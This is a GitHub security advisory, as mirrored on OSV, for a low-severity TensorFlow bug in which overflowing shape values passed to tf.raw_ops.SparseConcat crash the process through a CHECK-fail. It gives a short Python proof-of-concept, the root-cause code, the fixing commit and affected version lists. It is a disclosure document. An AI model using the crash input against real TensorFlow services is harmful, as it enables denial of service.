GHSA-6j9c-grc6-5m6g

Suggest an improvement
Source
https://github.com/advisories/GHSA-6j9c-grc6-5m6g
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6j9c-grc6-5m6g/GHSA-6j9c-grc6-5m6g.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-6j9c-grc6-5m6g
Aliases
Published
2021-05-21T14:22:24Z
Modified
2024-10-30T23:41:13.126551Z
Severity
  • 2.5 (Low) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L CVSS Calculator
  • 2.0 (Low) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N CVSS Calculator
Summary
CHECK-fail in SparseConcat
Details

Impact

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat:

import tensorflow as tf
import numpy as np

indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64)
indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64)
indices = [indices_1, indices_2]

values_1 = tf.zeros([0], dtype=tf.int64)
values_2 = tf.zeros([0], dtype=tf.int64)
values = [values_1, values_2]

shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64)
shape_2 = tf.zeros([9], dtype=tf.int64)
shapes = [shape_1, shape_2]

tf.raw_ops.SparseConcat(indices=indices, values=values, shapes=shapes, concat_dim=2)

This is because the implementation takes the values specified in shapes[0] as dimensions for the output shape:

TensorShape input_shape(shapes[0].vec<int64>());

The TensorShape constructor uses a CHECK operation which triggers when InitDims returns a non-OK status.

template &lt;class Shape>
TensorShapeBase<Shape>::TensorShapeBase(gtl::ArraySlice<int64> dim_sizes) {
  set_tag(REP16);
  set_data_type(DT_INVALID);
  TF_CHECK_OK(InitDims(dim_sizes));
}

In our scenario, this occurs when adding a dimension from the argument results in overflow:

template &lt;class Shape>
Status TensorShapeBase<Shape>::InitDims(gtl::ArraySlice<int64> dim_sizes) {
  ...
  Status status = Status::OK();
  for (int64 s : dim_sizes) {
    status.Update(AddDimWithStatus(internal::SubtleMustCopy(s)));
    if (!status.ok()) {
      return status;
    }
  }
}

template &lt;class Shape>
Status TensorShapeBase<Shape>::AddDimWithStatus(int64 size) {
  ...
  int64 new_num_elements;
  if (kIsPartial && (num_elements() < 0 || size < 0)) {
    new_num_elements = -1;
  } else {
    new_num_elements = MultiplyWithoutOverflow(num_elements(), size);
    if (TF_PREDICT_FALSE(new_num_elements < 0)) {
        return errors::Internal("Encountered overflow when multiplying ",
                                num_elements(), " with ", size,
                                ", result: ", new_num_elements);
      }
  }
  ...
}

This is a legacy implementation of the constructor and operations should use BuildTensorShapeBase or AddDimWithStatus to prevent CHECK-failures in the presence of overflows.

Patches

We have patched the issue in GitHub commit 69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c.

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.

Database specific
{
    "nvd_published_at": "2021-05-14T20:15:00Z",
    "cwe_ids": [
        "CWE-754"
    ],
    "severity": "LOW",
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-18T22:44:01Z"
}
References

Affected packages

PyPI / tensorflow

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.1.4

Affected versions

0.*

0.12.0
0.12.1

1.*

1.0.0
1.0.1
1.1.0
1.2.0
1.2.1
1.3.0
1.4.0
1.4.1
1.5.0
1.5.1
1.6.0
1.7.0
1.7.1
1.8.0
1.9.0
1.10.0
1.10.1
1.11.0
1.12.0
1.12.2
1.12.3
1.13.1
1.13.2
1.14.0
1.15.0
1.15.2
1.15.3
1.15.4
1.15.5

2.*

2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.1.0
2.1.1
2.1.2
2.1.3

PyPI / tensorflow

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.2.0
Fixed
2.2.3

Affected versions

2.*

2.2.0
2.2.1
2.2.2

PyPI / tensorflow

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.3.0
Fixed
2.3.3

Affected versions

2.*

2.3.0
2.3.1
2.3.2

PyPI / tensorflow

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.4.0
Fixed
2.4.2

Affected versions

2.*

2.4.0
2.4.1

PyPI / tensorflow-cpu

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.1.4

Affected versions

1.*

1.15.0

2.*

2.1.0
2.1.1
2.1.2
2.1.3

PyPI / tensorflow-cpu

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.2.0
Fixed
2.2.3

Affected versions

2.*

2.2.0
2.2.1
2.2.2

PyPI / tensorflow-cpu

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.3.0
Fixed
2.3.3

Affected versions

2.*

2.3.0
2.3.1
2.3.2

PyPI / tensorflow-cpu

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.4.0
Fixed
2.4.2

Affected versions

2.*

2.4.0
2.4.1

PyPI / tensorflow-gpu

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.1.4

Affected versions

0.*

0.12.0
0.12.1

1.*

1.0.0
1.0.1
1.1.0
1.2.0
1.2.1
1.3.0
1.4.0
1.4.1
1.5.0
1.5.1
1.6.0
1.7.0
1.7.1
1.8.0
1.9.0
1.10.0
1.10.1
1.11.0
1.12.0
1.12.2
1.12.3
1.13.1
1.13.2
1.14.0
1.15.0
1.15.2
1.15.3
1.15.4
1.15.5

2.*

2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.1.0
2.1.1
2.1.2
2.1.3

PyPI / tensorflow-gpu

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.2.0
Fixed
2.2.3

Affected versions

2.*

2.2.0
2.2.1
2.2.2

PyPI / tensorflow-gpu

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.3.0
Fixed
2.3.3

Affected versions

2.*

2.3.0
2.3.1
2.3.2

PyPI / tensorflow-gpu

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.4.0
Fixed
2.4.2

Affected versions

2.*

2.4.0
2.4.1